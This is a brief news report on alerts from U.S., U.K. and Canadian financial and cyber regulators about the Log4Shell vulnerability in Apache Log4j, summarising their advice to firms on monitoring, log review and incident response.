Regulators in the U.S. and U.K. are warning the financial industry about a cybersecurity vulnerability that has been uncovered with open-source software widely used in enterprise applications and cloud services.
Both the U.S. Financial Industry Regulatory Authority Inc. (FINRA) and the U.K.’s Financial Conduct Authority (FCA) issued alerts about the possible exploitation of a weakness in the Apache Log4j software.
“The ‘Log4Shell’ vulnerability presents risk for member firms because they may be using this software in internal applications, or the software may be embedded in third-party software packages,” FINRA warned.
The self-regulatory organization said hackers could exploit the vulnerability to “compromise systems to potentially steal information or engage in fraudulent activities.”
“For example, a remote attacker can exploit this vulnerability to take control of an affected system,” it warned.
Given the risk, FINRA recommended that firms work with their third-party vendors, including any IT service providers, to monitor for attempts to exploit the vulnerability and to review historical logs for possible breaches.
If attacks are identified, firms should consider activating incident response plans and treating these incidents as “high-risk cybersecurity” incidents, it said.
It also advised firms to examine their firewalls and other cybersecurity measures to address these new risks.
The advisory reminded firms of their regulatory obligations, both under FINRA rules and the U.S. Securities and Exchange Commission’s regulations, to have adequate cybersecurity measures in place.
In its own advisory, the FCA called on firms to review new guidance from its National Cyber Security Centre to address the issue.
The Canadian Centre for Cyber Security has also issued an alert about the vulnerability.